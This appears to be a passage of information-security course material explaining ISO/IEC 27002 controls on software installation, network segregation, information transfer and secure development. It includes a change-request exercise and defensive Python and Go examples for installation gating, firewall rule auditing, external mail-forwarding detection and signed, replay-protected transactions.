12.6.2 Restrictions on software installation
Rules governing the installation of software by users should be established and implemented.
Policy provisions to restrict the installation of software by users should be established and implemented.
The principle of least privilege should be applied. If certain privileges have been granted, users may have
the ability to install software. The organization should identify what types of software installations are
permitted (e.g. updates and security patches to existing software and authorized software list) and what
types of installations are prohibited (e.g. software that is only for personal use and software whose
pedigree with regard to being potentially malicious is unknown or suspect). Organizations may also wish
to consider communicating a process for evaluating and approving new software.
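The 12.5.1 considerations (trained administrator, management authorization, approved executable code only, audit log of updates, previous version retained for rollback) and the 12.6.2 authorized software list combine naturally into one installation gate. The following is an added example (not part of the BSI course text) of such a gate for an operational host; the role names, change reference and package artifacts are constructed assumptions, and the approved hashes are derived from constructed bytes so the example runs offline.

```python
"""Controlled installation on an operational system: an added example, not
part of the BSI course text. It puts the 12.5.1 considerations (trained
administrator with management authorization, approved executable code only,
audit log of updates, previous version retained for rollback) and the 12.6.2
rule of an authorized software list into one check. Role names, change
references and the package artifacts are constructed assumptions."""
import hashlib
from datetime import datetime, timezone

# Register of approved releases: (name, version) -> SHA-256 of the approved artifact.
# Hashes are derived from constructed artifact bytes so the example is self-contained.
APPROVED_ARTIFACTS = {
    ("webapp", "2.3.0"): b"webapp release 2.3.0 (constructed artifact)",
    ("webapp", "2.4.1"): b"webapp release 2.4.1 (constructed artifact)",
}
APPROVED_RELEASES = {k: hashlib.sha256(v).hexdigest() for k, v in APPROVED_ARTIFACTS.items()}
TRAINED_ADMINS = {"ops-admin"}                       # assumed role assignment
AUTHORIZED_CHANGES = {"CR-EXAMPLE-001": "webapp"}    # change ref -> package it authorizes


class OperationalHost:
    def __init__(self, hostname, installed):
        self.hostname = hostname
        self.installed = dict(installed)   # name -> version currently live
        self.previous = {}                 # name -> version kept for rollback
        self.audit_log = []

    def _log(self, action, **detail):
        entry = {"ts": datetime.now(timezone.utc).isoformat(), "host": self.hostname,
                 "action": action, **detail}
        self.audit_log.append(entry)
        return entry

    def install(self, name, version, artifact, requester, change_ref):
        """Apply every control before touching the live system; log the outcome either way."""
        if requester not in TRAINED_ADMINS:
            reason = "requester lacks administrator role"
        elif AUTHORIZED_CHANGES.get(change_ref) != name:
            reason = "no management authorization for this package"
        elif APPROVED_RELEASES.get((name, version)) != hashlib.sha256(artifact).hexdigest():
            reason = "not an approved release/artifact"
        else:
            reason = None
        if reason:
            self._log("install-denied", package=name, version=version,
                      requester=requester, change_ref=change_ref, reason=reason)
            return "denied: " + reason
        if name in self.installed:
            self.previous[name] = self.installed[name]   # contingency copy for rollback
        self.installed[name] = version
        self._log("install", package=name, version=version,
                  requester=requester, change_ref=change_ref)
        return "installed"

    def rollback(self, name, requester):
        """Restore the retained previous version; also an administrator-only, logged action."""
        if requester not in TRAINED_ADMINS or name not in self.previous:
            self._log("rollback-denied", package=name, requester=requester)
            return "rollback denied"
        self.installed[name] = self.previous.pop(name)
        self._log("rollback", package=name, version=self.installed[name], requester=requester)
        return "rolled back"


def run_demo():
    """Constructed sequence: approved upgrade, tampered artifact, unauthorized requester, rollback."""
    host = OperationalHost("web1", {"webapp": "2.3.0"})
    good = APPROVED_ARTIFACTS[("webapp", "2.4.1")]
    results = [
        host.install("webapp", "2.4.1", good, "ops-admin", "CR-EXAMPLE-001"),
        host.install("webapp", "2.4.1", good + b" tampered", "ops-admin", "CR-EXAMPLE-001"),
        host.install("webapp", "2.4.1", good, "developer", "CR-EXAMPLE-001"),
        host.rollback("webapp", "ops-admin"),
    ]
    return host, results


if __name__ == "__main__":
    host, results = run_demo()
    print(results)
    for entry in host.audit_log:
        print(entry)
```

Denied attempts are logged with the reason, not just successful installs: a series of rejected artifacts or an unauthorized requester is itself a signal worth reviewing.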
12.7 Information systems audit considerations
Objective: To minimize the impact of audit activities on operational systems.
12.7.1 Information systems audit controls
Audit requirements and activities involving verification of operational systems should be carefully
planned and agreed to minimize disruptions to business processes.
Information system audit activities involving the verification of operational systems should be
carefully defined, scheduled (running audit tests that could conflict with system availability
requirements outside working hours or peak periods), planned and agreed with appropriate management
to minimize disruptions to business processes. The scope of technical audit tests should be agreed and
controlled.
Audit tests should be limited to read-only access to software and data. Access other than read-only
should only be allowed for isolated copies of system files, which should be erased when the audit is
completed, or given appropriate protection if there is an obligation to keep such files under audit
documentation requirements. All access should be monitored and logged to produce a reference trail.
Activity 7: Change management
Purpose: Complete a change request form.
Duration:
25 minutes individual
15 minutes feedback and discussion
Directions:
ABC Organization Ltd has identified a need to upgrade the current Windows 2008 R2 server (which
hosts the company’s website) for a more up-to-date Windows 2016 server. This upgrade is likely to
cause severe disruption to the business if it is not managed appropriately.
You are responsible for managing the change and in the first instance, you need to complete a
change request form.
Working in pairs or in small groups, complete the change request form below with the goal of
ensuring that the change is managed appropriately. Your response along with those from other
groups will then be discussed by the whole class.
ABC Organization Ltd Change Request Form
General information
Change request number:
Requester name
Date
Office
Contact
Desk phone
Mobile number
Email address
Change request definition
Description – Describe the proposed change
Justification – Justify why the proposed changes should be implemented
Impact of not implementing – Explain the impact if the proposed change is not implemented
Change request impact evaluation:
Check one: High / Medium / Low
Impact description – Describe the impact and justify your choice
Change request priority:
Check one: 1 / 2 / 3 / Emergency
Priority justification – Describe why you have chosen the priority indicated above
Change rollback plan – Describe the rollback process in case of change failure
Change test plan – Describe the testing process
Change request approval
Name (identify change request approvers)        Recommendation
Approver 1:                                     Approve / Reject
Approver 2:                                     Approve / Reject
Approver 3:                                     Approve / Reject
Approver 4:                                     Approve / Reject
Key:
Impact levels
High – Any change that has a high degree of probability of affecting a significant number of users
or which means that the availability of a key system is affected for a significant period of time.
Medium – Any change that has the probability of affecting several users or which means that the
availability of a system is affected for a long period of time.
Low – Any change that will only affect a single user or a small number of users or which means
that the availability of a system is affected for a short period of time.
Priority levels
1 – The change is required to take place within 7 days
2 – The change is required to take place within 14 days
3 – The change is required to take place within 30 days
Emergency – The change has already been completed to resolve a security incident or severe
business issue and this form is being completed retrospectively.
13.1 Network security management
Objective: To ensure the protection of information in networks and its supporting information
processing facilities.
13.1.1 Network controls
Networks should be managed and controlled to protect information in systems and applications.
The purpose of network security, quite simply, is to protect the network and its component parts
from unauthorized access and misuse. Networks are vulnerable because of their inherent
characteristic of facilitating remote access. It is vital that any network, regardless of its size or type, is
managed and controlled to protect information in systems and applications.
When defining a network security policy, organizations should ensure that clear responsibilities are
established for the management of networking equipment and segregated from responsibilities for
computer operations where appropriate (6.1.2) to reduce insider threats.
Consideration should be given to the documented operating procedures required to manage networks
and to ensure that controls are consistently applied across the information processing infrastructure,
as well as to the logging and monitoring required to record and detect actions that may affect security
or that indicate a breach or compromise.
Key network security requirements include:
• Restricting systems connection, thereby preventing unauthorized access
• Safeguarding the confidentiality and integrity of data passing over public networks or over wireless
networks and protecting the connected systems and applications (see Clause 10 and 13.2)
• Maintaining the availability of the network services and computers connected
• Authenticating systems on the network
Additional information on network security can be found in ISO/IEC 27033.[15][16][17][18][19]
13.1.2 Security of network services
Security mechanisms, service levels and management requirements of all network services should be
identified and included in network services agreements, whether these services are provided in-house
or outsourced.
Network services include the provision of connections, private network services, value added
networks and managed network security solutions such as firewalls, intrusion prevention systems
(IPS) and intrusion detection systems (IDS). These services can range from simple unmanaged
bandwidth to complex value-added offerings and can be managed or provided in-house or
outsourced, or a combination of both.
The security arrangements necessary for particular services, such as security features, service levels
and management requirements, should be identified.
The ability of all network service providers to manage agreed services in a secure way should be
determined and regularly monitored. Network service agreements should include details of the
required security mechanisms and service levels, and the right to audit should be agreed. The
organization should determine appropriate means of ensuring that network service providers
implement these measures as required.
Security features of network services could be:
• Technology applied for security of network services, such as authentication, encryption and
network connection controls
• Technical parameters required for secured connection with the network services in accordance
with the security and network connection rules
• Procedures for the network service usage to restrict access to network services or applications,
where necessary
13.1.3 Segregation in networks
Groups of information services, users and information systems should be segregated on networks.
Segregating access to systems, groups of information services, user groups and information assets is
necessary in order to limit and contain threat exposure and to apply targeted controls, avoiding
blanket application of over-onerous or potentially costly controls in areas where they are not
required.
One method of managing the security of large networks is to divide them into separate network
domains. The domains can be chosen based on trust levels (e.g. public access domain, desktop
domain, server domain), along organizational units (e.g. human resources, finance, marketing) or
some combination (e.g. server domain connecting to multiple organizational units). The segregation
can be conducted using either physically different networks or by using different logical networks
(e.g. virtual private networking).
The perimeter of each domain should be well defined. Access between network domains is allowed,
but should be controlled at the perimeter using a gateway (e.g. firewall, filtering router). The criteria
for segregation of networks into domains, and the access allowed through the gateways, should be
based on an assessment of the security risks and requirements of each domain. The assessment
should be in accordance with the access control policy (see 9.1.1), access requirements, value and
classification of information processed and also take account of the relative cost and performance
impact of incorporating suitable gateway technology.
Due to their nature, wireless networks require special treatment. For sensitive environments,
consideration should be given to treating all wireless access as an external connection and
segregating it from internal networks until it has passed through a gateway in accordance with the
network controls policy (see 13.1.1) before access to internal systems is granted. The authentication,
encryption and user-level network access control technologies of standards-based wireless networks
may, however, be sufficient for direct connection to the organization’s internal network when
properly implemented.
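The domain model above (trust-level domains, a gateway at each perimeter, access decided by an assessed rule set, wireless treated as external) can be expressed as a small policy and checked before it is pushed to a firewall. The following is an added example (not part of the BSI course text) of such a policy: the address ranges, domain names and rules are constructed, and the audit function flags the two defects a reviewer of the gateway rule set would look for first.

```python
"""Domain-based gateway policy: an added example, not part of the BSI course
text. It models the 13.1.3 approach: hosts are classified into network
domains by trust level, wireless is treated as external, and traffic between
domains is default-deny with each allowed flow tied to a documented
justification. The address ranges, domains and rules are constructed
assumptions."""
import ipaddress

# Trust-level domains (constructed ranges). Anything unmatched is "public".
DOMAINS = {
    "server":   ipaddress.ip_network("10.20.0.0/16"),
    "desktop":  ipaddress.ip_network("10.10.0.0/16"),
    "wireless": ipaddress.ip_network("10.50.0.0/16"),
    "dmz":      ipaddress.ip_network("192.0.2.0/24"),
}
EXTERNAL_DOMAINS = {"public", "wireless"}   # wireless handled as an external connection

# Gateway rules: (src domain, dst domain, protocol, dst port, justification). Default deny.
RULES = [
    ("desktop",  "server", "tcp", 443,  "staff access to internal web applications"),
    ("public",   "dmz",    "tcp", 443,  "customer access to the public web site"),
    ("wireless", "dmz",    "tcp", 443,  "visitor access, same treatment as public"),
    ("dmz",      "server", "tcp", 5432, "web tier to database, specific port only"),
]


def domain_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for name, net in DOMAINS.items():
        if addr in net:
            return name
    return "public"


def is_allowed(src_ip, dst_ip, proto, port):
    """Return (allowed, reason). Traffic within one domain does not cross the gateway."""
    src, dst = domain_of(src_ip), domain_of(dst_ip)
    if src == dst:
        return True, f"intra-domain ({src})"
    for rs, rd, rp, rport, why in RULES:
        if (rs, rd, rp, rport) == (src, dst, proto, port):
            return True, f"rule: {why}"
    return False, f"default deny {src}->{dst} {proto}/{port}"


def audit_rules(rules):
    """Flag rules that let an external domain reach the server domain directly
    or that carry no justification: both defeat the purpose of segregation."""
    findings = []
    for rs, rd, rp, rport, why in rules:
        if rs in EXTERNAL_DOMAINS and rd == "server":
            findings.append(f"{rs}->{rd} {rp}/{rport}: external domain reaches servers directly")
        if not why.strip():
            findings.append(f"{rs}->{rd} {rp}/{rport}: no documented justification")
    return findings


if __name__ == "__main__":
    for flow in [("10.10.4.7", "10.20.1.5", "tcp", 443),     # desktop -> server
                 ("10.50.3.9", "10.20.1.5", "tcp", 443),     # wireless -> server
                 ("198.51.100.4", "192.0.2.10", "tcp", 443), # public -> dmz
                 ("192.0.2.10", "10.20.1.5", "tcp", 22)]:    # dmz -> server, wrong port
        print(flow, is_allowed(*flow))
    print("audit findings:", audit_rules(RULES))
```

The justification string is deliberately part of the rule, not a comment beside it: the assessment of security risks and requirements that 13.1.3 bases the gateway rules on has to survive in the rule set, or the next reviewer cannot tell a considered exception from a forgotten one.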
13.2 Information transfer
Objective: To maintain the security of information transferred within an organization and with any
external entity.
13.2.1 Information transfer policies and procedures
Formal transfer policies, procedures and controls should be in place to protect the transfer of
information through the use of all types of communication facilities.
Ensuring that appropriate agreements and control measures are implemented to protect information
is vital before transferring information to third parties: from the security of the transfer method
itself, to how access to the information will be controlled and how it will be handled and otherwise
protected by the third party. Formal transfer policies (and supporting guidelines) should be
implemented to protect the transfer of information through the use of all types of communication
facilities; they should outline acceptable use of communication facilities, responsibilities not to
compromise the organization and to take appropriate precautions not to reveal confidential
information, transfer procedures and sharing controls. The business, legal and security implications
associated with all electronic data transfers (including electronic data interchange, electronic
commerce and electronic communications) should be considered.
The procedures and controls to be followed when using communication facilities for information
transfer should consider the following:
• Risk assessment of information transfer methods (particularly if using third party or cloud based
services)
• Controls needed to protect information from interception, copying, modification, misrouting and
destruction
• Detection of and protection against malware that may be transmitted through the use of electronic
communications (see 12.2.1)
• Protection of sensitive electronic information (particularly in the form of attachments)
• Use of cryptographic techniques e.g. to protect the confidentiality, integrity and authenticity of
information (see Clause 10)
• Retention and disposal provisions in accordance with relevant national and local legislation and
regulations
• Controls and restrictions associated with using communication facilities, e.g. automatic forwarding
of electronic mail to external mail addresses
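The last bullet names automatic forwarding of electronic mail to external addresses as a control point, and whether such rules exist is a question a mail-system audit log can answer. The Go program below is an added example, not code from this course or from any mail product: it scans a constructed audit extract (the line format, user names and domains are assumptions made for the example) and reports every forwarding rule whose target lies outside the organization's own domains. Subdomains of an internal domain are treated as internal and the comparison is case-insensitive, the two places where a naive string match commonly goes wrong.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding records one mailbox whose mail is forwarded outside the organization.
type Finding struct {
	Time   string
	User   string
	Target string
}

// isInternal reports whether addr belongs to one of the organization's domains
// (exact match or a subdomain of it), compared case-insensitively.
func isInternal(addr string, internalDomains []string) bool {
	at := strings.LastIndex(addr, "@")
	if at < 0 || at == len(addr)-1 {
		return false // not a usable address: treat as external so it gets reviewed
	}
	domain := strings.ToLower(addr[at+1:])
	for _, d := range internalDomains {
		d = strings.ToLower(d)
		if domain == d || strings.HasSuffix(domain, "."+d) {
			return true
		}
	}
	return false
}

// parseKV splits "k=v k2=v2" fields into a map; fields without '=' are ignored.
func parseKV(fields []string) map[string]string {
	kv := map[string]string{}
	for _, f := range fields {
		if i := strings.Index(f, "="); i > 0 {
			kv[f[:i]] = f[i+1:]
		}
	}
	return kv
}

// FindExternalForwards scans audit lines of the constructed form
//   <timestamp> user=<mailbox> action=<name> [target=<address>]
// and returns every forwarding rule whose target is outside internalDomains.
// Lines with other actions, and malformed lines, are skipped.
func FindExternalForwards(lines []string, internalDomains []string) []Finding {
	var out []Finding
	for _, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 3 {
			continue
		}
		kv := parseKV(fields[1:])
		if kv["action"] != "SetForwarding" {
			continue
		}
		target, ok := kv["target"]
		if !ok || isInternal(target, internalDomains) {
			continue
		}
		out = append(out, Finding{Time: fields[0], User: kv["user"], Target: target})
	}
	return out
}

// SampleLog is a constructed audit extract; format, names and domains are illustrative.
var SampleLog = []string{
	"2017-11-02T09:15:01Z user=alice action=Login",
	"2017-11-02T09:16:44Z user=alice action=SetForwarding target=alice.archive@mail.example.com",
	"2017-11-02T10:02:13Z user=bob action=SetForwarding target=bob.personal@webmail.example.net",
	"2017-11-02T10:05:00Z user=carol action=SetForwarding target=CAROL@EXAMPLE.COM",
	"2017-11-02T11:30:27Z user=dave action=DeleteForwarding",
	"garbage line",
}

func main() {
	for _, f := range FindExternalForwards(SampleLog, []string{"example.com"}) {
		fmt.Printf("%s %s forwards mail to %s (external)\n", f.Time, f.User, f.Target)
	}
}
```

On the sample extract only bob's rule is reported: alice forwards to a subdomain of example.com and carol's target differs only in letter case, so both are internal. A real deployment would feed the same function from the mail platform's rule-change audit trail and review each finding against the policy exceptions the organization has approved.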
13.2.2 Agreements on information transfer
Agreements should address the secure transfer of business information between the organization and
external parties.
Agreements should be implemented with all third parties with whom information is exchanged, to
ensure that secure information transfer, handling and protection requirements are implemented by both
the organization and the third party. Where personal data is shared with or transferred to third parties,
data controller and processor responsibilities and the associated required control measures must be
defined in accordance with local data protection laws (see 18.1.4).
The information security content of any agreement should reflect the sensitivity of the business
information involved.
Information transfer agreements should incorporate the following:
• Management responsibilities for controlling and notifying transmission, dispatch and receipt
• Procedures to ensure traceability and non-repudiation
• Minimum technical standards for packaging and transmission
• Escrow agreements, where applicable
• Courier identification standards
• Responsibilities and liabilities in the event of information security incidents, such as loss of data
• Use of an agreed labelling system for sensitive or critical information, ensuring that the meaning of
the labels is immediately understood and that the information is appropriately protected (see 8.2)
• Technical standards for recording and reading information and software
• Any special controls that are required to protect sensitive items, such as cryptography (see Clause
10)
• Maintaining a chain of custody for information while in transit
• Acceptable levels of (and if necessary processes for) access control
13.2.3 Electronic messaging
Information involved in electronic messaging should be appropriately protected.
There are many types of electronic messaging, such as email, electronic data interchange and social
networking, which play a role in business communications. Unprotected (unencrypted) email and
other forms of instant electronic messaging are not secure forms of communication and may be
intercepted. It is not possible to guarantee that only the intended recipient will
read an electronic message. Multiple copies of an email message are stored on different systems which
are accessible to different people, and it may not be possible to fully remove email messages from
systems, even if required. For all of these reasons it is vital that organizations establish appropriate
internal policies and controls, and agreements with third parties, relating to the use of electronic messaging.
Electronic messaging policy provisions are typically included within IT, Acceptable Use and/or Information
Classification, Handling and Protection Policies.
Information security considerations for electronic messaging should include:
• Protecting messages from unauthorized access, modification or denial of service commensurate with
the classification scheme adopted by the organization
• Ensuring correct addressing and transportation of the message
• Reliability and availability of the service
• Legal considerations, for example requirements for electronic signatures
• Obtaining approval prior to using external public services such as instant messaging, social networking
or file sharing
• Stronger levels of authentication controlling access from publicly accessible networks
13.2.4 Confidentiality or non-disclosure agreements
Requirements for confidentiality or non-disclosure agreements reflecting the organization’s needs for the
protection of information should be identified, regularly reviewed and documented.
Based on the confidentiality of the information to be disclosed or shared, appropriate confidentiality/non-disclosure
and acceptable information handling and protection provisions should be agreed prior to releasing information
to external parties or to employees of the organization. Confidentiality or non-disclosure agreements should
address the requirement to protect confidential information using legally enforceable terms.
To identify requirements for confidentiality or non-disclosure agreements, the following elements should
be considered:
• Definition of the information to be protected (e.g. confidential information)
• Expected duration of an agreement, including cases where confidentiality might need to be maintained
indefinitely
• Required actions when an agreement is terminated
• Responsibilities and actions of signatories to avoid unauthorized information disclosure
• Ownership of information, trade secrets and intellectual property, and how this relates to the protection
of confidential information
• Permitted use of confidential information and rights of the signatory to use information
• The right to audit and monitor activities that involve confidential information
• Process for notification and reporting of unauthorized disclosure or confidential information leakage
• Terms for information to be returned or destroyed at agreement cessation
• Expected actions to be taken in case of a breach of the agreement
Requirements for confidentiality and non-disclosure agreements should be reviewed periodically and when
changes occur that influence these requirements.
14.1 System acquisition, development and maintenance
Objective: To ensure that information security is an integral part of information systems across the
entire lifecycle. This also includes the requirements for information systems which provide services
over public networks.
In acquiring new information systems or making enhancements to existing information systems and
delivering business benefits, care needs to be taken to ensure that:
• Security vulnerabilities are not introduced
• Confidentiality, integrity and availability of information assets processed and stored within systems
are not compromised
• Information security is an integral part of information systems across their entire lifecycle
14.1.1 Information security requirements analysis and specification
The information security related requirements should be included in the requirements for new
information systems or enhancements to existing information systems.
The requirements or specifications for new systems or enhancements need to be clearly defined,
including information security requirements. Requirements can be derived from a variety of sources
including compliance requirements from policies and regulations, threat modelling, incident reviews,
or using vulnerability thresholds. Results of the identification of requirements should be documented
and reviewed by all stakeholders.
Information security requirements and controls should reflect the business value of the information
involved (see 8.2) and the potential negative business impact which might result from lack of
adequate security.
Identification and management of information security requirements and associated processes should
be integrated in the early stages of information systems projects. Early consideration of information
security requirements, e.g. at the design stage, can lead to more effective and cost-efficient solutions.
Specific information security requirements may include:
• Level of user security expectations including authentication, privacy and data protection
• The required confidentiality, integrity and availability protection needs of the information assets
involved
• Access provisioning and authorization processes, for business/general users as well as for
privileged or technical users
• Means of informing users and operators of their duties and responsibilities
• Requirements derived from business processes, such as activity or transaction logging and
monitoring or requirements to prevent repudiation of commitments
• Requirements mandated by other security controls, e.g. interfaces to logging and monitoring or
data loss prevention (DLP) systems
• Where applicable, controls to protect information, services and transactions passing over public
networks (see 14.1.2 and 14.1.3)
If products are acquired, a formal testing and acquisition process should be followed. Contracts with
the supplier should address the identified security requirements. Acquisition and development risks
should be assessed and addressed. Where the security functionality in a proposed product does not
satisfy the specified requirement, the risk introduced and associated controls should be reconsidered
prior to purchasing the product.
Available guidance for security configuration of the product, aligned with the final software/service
stack of that system, should be evaluated and implemented.
Criteria for testing and accepting products should be defined in terms of their functionality and
effectiveness of security controls. Products should be tested and/or evaluated against these criteria
before acquisition or operation.
14.1.2 Securing application services on public networks
Information involved in application services passing over public networks should be protected from
fraudulent activity, contract dispute and unauthorized disclosure and modification.
Applications accessible via public networks are subject to a range of network related threats, such as
fraudulent activities including data modification, contract disputes or disclosure of information to the
public. Therefore, detailed risk assessments and proper selection of controls are indispensable.
Where application services pass over public networks, organizations should:
• Consider what degree of assurance each party needs that the other's claimed identity is real, and
then build controls into the solution to provide that assurance. This can be done through the use
of various authentication methods: the lower the degree of assurance required, the simpler the
method may be (e.g. the use of passwords); the greater the degree of assurance required, the more
multi-factor authentication should be considered
• Processes should be established to ensure that key transactional documents can only be approved,
signed or issued by specific individuals or roles. When these roles are established, each party
should be informed of the levels of authorization they have for the use of the service
• A number of key documents may be required for a transactional relationship between two entities to
exist, such as contracts, service level agreements and codes of connection. These documents may
contain sensitive information and should be protected to ensure their confidentiality, integrity and
availability. Associated with this are specific controls, especially in terms of communication of the
documents and the integrity of their content, e.g. proof of dispatch and non-repudiation controls such as
digital signatures (see Clause 10 for the use of cryptography and Clause 18 for the legal aspects of
using cryptography, which differ between jurisdictions). Again, the greater the degree of assurance
required that a document has been sent or has not been tampered with, the greater the number or
strength of controls that need to be implemented
• In order for an organization to fulfil its obligations to provide reliable products and services over the
internet, a number of pieces of specific information may need to be acquired and utilized, e.g. order
information, payment information, delivery address details and so on. Consequently, assurance needs to
be maintained that the information acquired and in use is correct and up to date. Therefore controls
should be built into any system to guard against error and to detect unauthorized alterations
• The organization should also consider to what extent it requires accurate information associated with
payments. Again, a degree of assurance should be determined, perhaps based on the value of the transaction
or the timeliness of the transaction. Once determined, this degree of assurance should be met by the
implementation of verification checks within the system
• Many people are still reluctant to trust online transactions due to the levels of fraud that may exist within
different systems and in general on the internet. Internet based fraud is also a problem for the vendor in
that many goods and services are supplied without the need for name and address verification which can
act as a form of anti-fraud control. Consequently the form of payment required by the organization
should be carefully considered to ensure that fraudulent activity cannot take place and for the customer
to have confidence that their payment information will not be misused. If intending to take payments via
credit card or debit card then other obligations need to be considered such as the need to comply with
the Payment Card Industry Data Security Standard (PCI DSS). Associated with these obligations is the
need to evaluate the liability of any fraudulent activity that does take place (compliance with PCI DSS will
help to reduce this liability)
• Once transaction information has been received, care should be taken to ensure that the customer
(or any other malicious entity) cannot duplicate the transaction, while also ensuring that a duplicated
submission does not result in a second payment. Similarly, measures should be taken to ensure that the
payment is not processed twice. Also, controls should exist within the system to ensure that, once
acquired, transaction information is not lost, as it will be required for non-repudiation purposes in the
event of a dispute
Any service arrangement that is put into place between two parties should be formally agreed between the
two through the use of documented agreements.
A significant number of the considerations above relate mainly to the confidentiality and integrity
aspects of information security. Depending upon the service being provided, however, availability may be
equally important; this should be assessed and suitable controls put in place to ensure that availability is
maintained, for example through the use of highly resilient network connections and specific safeguards
against denial of service attacks against servers.
14.1.3 Protecting application services transactions
Information involved in application service transactions should be protected to prevent incomplete
transmission, mis-routing, unauthorized message alteration, unauthorized disclosure, unauthorized
message duplication or replay.
Services provided over the internet inevitably involve the exchange of transactional information
between two or more parties. If not protected, this information could be the cause of unwanted
outcomes, e.g. fraud. There are a number of specific controls that should be considered for
implementation within any transactional system including:
• The use, by each party involved in the transaction, of electronic signatures to provide assurance
that information that is to be relied upon for the service to be provided has not been altered in any
way by unauthorized parties
• The protection of the secret authentication information (e.g. passwords) of the parties involved in
the transaction both from an integrity point of view to ensure that the information can be relied
upon but also from a confidentiality point of view to protect against unauthorized access
• The confidentiality of the transaction itself, depending upon its nature, through the use of
encrypted communication paths and protection of the protocols used to provide communication
between all parties involved; and the privacy of all parties concerned, especially in light of changes
in many jurisdictions around the world to legislation associated with the protection of personally
identifiable information (see Clause 18), e.g. the General Data Protection Regulation (GDPR) in
Europe
• Controls to ensure that transactional information can be easily obtained, such as ensuring that
such information is stored at an internal network location and not on systems that are easily
accessed from the internet
• The use of public key infrastructure to ensure the validity of certificates used in transactional
systems. The information associated with the use of digital certificates should also be protected at
all times as should the communication paths between the organization and the Certificate
Authority (CA)
Careful consideration needs to be given to transactions that take place across borders as different
legal and regulatory requirements are likely to exist depending upon the jurisdiction, associated with
where the transaction is generated from, processed via, completed at or stored in.
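The electronic-signature, replay and duplicate-payment points made in this control, and in the transaction bullet of 14.1.2 above, are demonstrated by the following Go program. It is an added example, not code from this course or from BSI. Each party holds an Ed25519 key pair and signs the canonical encoding of a transaction that carries a random nonce; the service verifies the signature before anything else, refuses any (party, nonce) pair it has already accepted, and keeps the accepted transactions as its non-repudiation record. The party name, order identifier and amount are constructed values. Two caveats a practitioner would attach: the signature supports non-repudiation only while the private key is under the sole control of the signer (a shared HMAC secret could not, since the verifier could forge it), and the nonce store must be durable, because a store that is lost on restart lets an old submission through a second time.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
)

// Transaction is the message a party signs and submits. Nonce is a per-message
// random value the sender generates; the service remembers accepted nonces so a
// resubmitted or replayed copy is recognised and is not paid a second time.
type Transaction struct {
	OrderID string `json:"order_id"`
	Amount  int64  `json:"amount_cents"`
	Payee   string `json:"payee"`
	Nonce   string `json:"nonce"`
}

var (
	ErrBadSignature = errors.New("signature does not verify: message altered or not from this party")
	ErrReplay       = errors.New("nonce already accepted: duplicate or replayed transaction")
)

// canonical returns the exact bytes that are signed and later verified.
// json.Marshal on a struct emits fields in declaration order, so both sides agree.
func canonical(tx Transaction) ([]byte, error) { return json.Marshal(tx) }

// Sign produces the sender's Ed25519 signature over the canonical encoding.
func Sign(priv ed25519.PrivateKey, tx Transaction) ([]byte, error) {
	msg, err := canonical(tx)
	if err != nil {
		return nil, err
	}
	return ed25519.Sign(priv, msg), nil
}

// Processor is the service side: it holds each party's public key and the set
// of (party, nonce) pairs already accepted.
type Processor struct {
	keys      map[string]ed25519.PublicKey // party -> verification key
	seen      map[string]bool             // party + ":" + nonce already accepted
	Processed []Transaction               // transactions actually paid, kept as dispute evidence
}

func NewProcessor() *Processor {
	return &Processor{keys: map[string]ed25519.PublicKey{}, seen: map[string]bool{}}
}

// Register records the verification key a party has been issued.
func (p *Processor) Register(party string, pub ed25519.PublicKey) { p.keys[party] = pub }

// Accept verifies the signature, then checks the nonce, then records the
// transaction. The order matters: an unverifiable message must not consume a
// nonce, and a valid duplicate must be refused before any payment happens.
func (p *Processor) Accept(party string, tx Transaction, sig []byte) error {
	pub, ok := p.keys[party]
	if !ok {
		return fmt.Errorf("unknown party %q", party)
	}
	msg, err := canonical(tx)
	if err != nil {
		return err
	}
	if !ed25519.Verify(pub, msg, sig) {
		return ErrBadSignature
	}
	key := party + ":" + tx.Nonce
	if p.seen[key] {
		return ErrReplay
	}
	p.seen[key] = true
	p.Processed = append(p.Processed, tx)
	return nil
}

// NewNonce returns 16 random bytes, hex-encoded.
func NewNonce() string {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return fmt.Sprintf("%x", b)
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	p := NewProcessor()
	p.Register("customer-42", pub) // constructed party name
	tx := Transaction{OrderID: "ORD-1001", Amount: 1999, Payee: "shop", Nonce: NewNonce()}
	sig, _ := Sign(priv, tx)
	fmt.Println("first submission:", p.Accept("customer-42", tx, sig)) // <nil>
	fmt.Println("resubmission:    ", p.Accept("customer-42", tx, sig)) // ErrReplay
	tx.Amount = 1 // altered in transit: the signature no longer matches
	fmt.Println("altered copy:    ", p.Accept("customer-42", tx, sig)) // ErrBadSignature
	fmt.Println("payments made:   ", len(p.Processed))                 // 1
}
```

The three rejections map onto the control's wording: the altered copy is "unauthorized message alteration", the resubmission is "duplication or replay", and the retained Processed slice is the record the organization needs in a dispute. A nonce alone does not bound how long a message stays valid; adding a timestamp to the signed fields and refusing stale ones is the usual complement.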
14.2 Security in development and support processes
Objective: To ensure that information security is designed and implemented within the development
lifecycle of information systems.
14.2.1 Secure development policy
Rules for the development of software and systems should be established and applied to
developments within the organization.
As with the acquisition of new systems (see 14.1.1), organizations need to establish their rules for
the development of software and systems to be applied to developments within their organizations or
to outsourced development; ensuring that information security is designed and implemented within
the full lifecycle of information systems. Secure development is a requirement to build up a secure
service, architecture, software and system.
Within a secure development policy, the following aspects should be considered:
• Establishing security requirements for development environments
• Assigning responsibilities or accessing appropriate resources to give guidance on security in the
software development lifecycle and/or defining required application security knowledge
• Integrating security in the software development methodology and setting checkpoints to ensure
that security requirements are being met
• Establishing security requirements in the design phase
• Establishing secure coding standards (for or applicable to each programming language used)
• Securing code repositories
• Applying security in the version control
• Ensuring developers’ capability of avoiding, finding and fixing vulnerabilities
Secure programming techniques should be used both for new developments and in code re-use
scenarios where the standards applied to development may not be known or are not consistent with
current best practices.
Developers should be trained in their use, and testing and code review should verify their use. If
development is outsourced, the organization should obtain assurance that the external party complies
with these rules for secure development (see 14.2.7).
14.2.2 System change control procedures
Changes to systems within the development lifecycle should be controlled by the use of formal
change control procedures.
As seen within 12.1.2, without effective change management, vulnerabilities can be introduced and
operational functionality broken. Making software changes can impact the operational environment
and vice versa.
Formal system change control procedures should be documented and enforced to ensure the
integrity of systems, applications and products, from the early design stages through all subsequent
maintenance efforts. Introduction of new systems and major changes to existing systems should
follow a formal process of documentation, specification, testing, quality control and managed
implementation.
